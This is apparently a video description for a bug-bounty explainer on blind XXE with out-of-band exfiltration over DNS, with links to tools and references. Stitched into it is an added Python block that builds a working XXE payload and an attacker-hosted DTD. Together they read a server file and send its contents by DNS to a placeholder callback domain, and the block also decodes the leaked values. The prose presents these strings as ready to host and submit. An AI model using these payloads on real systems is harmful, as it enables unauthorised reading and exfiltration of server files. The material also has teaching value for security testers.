A $7.500 BUG BOUNTY Bug explained, step by step. (BLIND XXE OOB over DNS) - REDUX

Video description

Have you ever wondered what a $7.500 Bug Bounty bug looks like?
In this "re-upload" of the original video created in 2019, I'll walk you through a theoretical "BLIND XXE OOB over DNS" bug on a super-hardened target and explain the ideas around how to exploit it.
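To make the technique named above concrete, here is an added worked example (not the video author's payload and not output of Upload Scanner) of how a blind XXE bug is turned into an out-of-band DNS leak. The callback domain collab.example, the DTD URL and the target file /etc/hostname are assumed placeholders. The XML handed to the target pulls an attacker-hosted DTD; that DTD uses a nested parameter entity to splice the file content into the host part of a URL, so the parser performs a DNS lookup of <content>.collab.example before it ever tries to connect, which is why the leak survives a target with no outbound HTTP. The two helper functions cover the caveat and the check a practitioner needs: only short, hostname-legal values fit in a query name, and the leaked value is recovered by stripping the callback suffix from the DNS hit.

```python
"""Blind XXE with out-of-band (OOB) exfiltration over DNS: payload builders,
a feasibility check, and the collaborator-side decoder.

Added example; not the video author's code. Domain, URL and file path are
assumed placeholders.
"""
import string

MAX_LABEL = 63    # RFC 1035: a single DNS label is at most 63 octets
MAX_QNAME = 253   # and a full name is at most 253 characters in text form
HOST_CHARS = set(string.ascii_letters + string.digits + "-")


def build_xxe_document(dtd_url: str) -> str:
    """XML the target parses. It carries no secret itself: it only makes the
    parser fetch and evaluate the attacker-hosted external DTD."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE data [ <!ENTITY % remote SYSTEM "{dtd_url}"> %remote; ]>\n'
        "<data>xxe</data>\n"
    )


def build_oob_dtd(target_file: str, callback_domain: str) -> str:
    """DTD served from the attacker host. %file; is the file content; %eval;
    declares a second entity whose URL embeds that content in the host name,
    so resolving %exfil; triggers DNS for <content>.<callback_domain>.
    &#x25; is an escaped '%' so the inner declaration survives the first
    parse and is only expanded when %eval; is referenced."""
    return (
        f'<!ENTITY % file SYSTEM "file://{target_file}">\n'
        '<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM '
        f"'http://%file;.{callback_domain}/'\">\n"
        "%eval;\n"
        "%exfil;\n"
    )


def fits_in_dns_name(value: str, callback_domain: str) -> bool:
    """The caveat of the DNS channel: raw file content lands in a host name,
    so it must be non-empty, use only letters/digits/hyphen/dot, keep every
    label at or under 63 characters and the whole name at or under 253.
    /etc/hostname passes; /etc/passwd (colons, newlines) does not."""
    if not value:
        return False
    if len(f"{value}.{callback_domain}") > MAX_QNAME:
        return False
    for label in value.split("."):
        if not label or len(label) > MAX_LABEL:
            return False
        if any(ch not in HOST_CHARS for ch in label):
            return False
    return True


def extract_leak(qname: str, callback_domain: str):
    """Collaborator side: given the query name seen in the DNS hit, return the
    leaked prefix, or None if the query was not for our callback domain.
    DNS is case-insensitive and logs often carry a trailing dot."""
    qname = qname.rstrip(".").lower()
    suffix = "." + callback_domain.lower()
    if not qname.endswith(suffix):
        return None
    return qname[: -len(suffix)]


if __name__ == "__main__":
    callback = "collab.example"  # assumed placeholder for a Collaborator host
    print(build_xxe_document(f"http://{callback}/oob.dtd"))
    print(build_oob_dtd("/etc/hostname", callback))
    # Constructed DNS hit, the kind of line a collaborator server would log:
    hit = "WEB-PROD-01.collab.example."
    print("leaked:", extract_leak(hit, callback))
```

The document and DTD strings are what you would host and submit; the check and decoder are what you run on your own side. When `fits_in_dns_name` returns False for the file you want, the DNS channel alone is not enough and you need the target to encode the content first (or fall back to an HTTP or FTP channel where one is open).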

The tool used in this video to create the initial XML/PDF payload is Tobias 'floyd' Ospelt's amazing Burp plugin "Upload Scanner". I absolutely recommend that you use it for all your file-upload automation needs.

  / floyd_ch  
https://github.com/portswigger/upload...

Owasp XXE
https://www.owasp.org/index.php/XML_E...

Out of band entity XXE explained
https://www.acunetix.com/blog/article...

Burp collaborator
https://portswigger.net/burp/document...

Exploiting XXE with local DTD files
https://mohemiv.com/all/exploiting-xx...

Comments are disabled by default, but you can find me and the community over at   / stokfredrik  

-------------- -- --
Support my work:
Join me on Patreon!   / stokfredrik  

Need a shell to hack from? Set up your own droplet today!
Get $100 credit on DigitalOcean using this link
https://m.do.co/c/5884b0601466
-------------- -- --
FAQ:

What gear do you use?
Check out https://www.stokfredrik.com

Dude, I love what you do. Can we do "work stuff" together?
Sure, email me at workwith @ stokfredrik.com
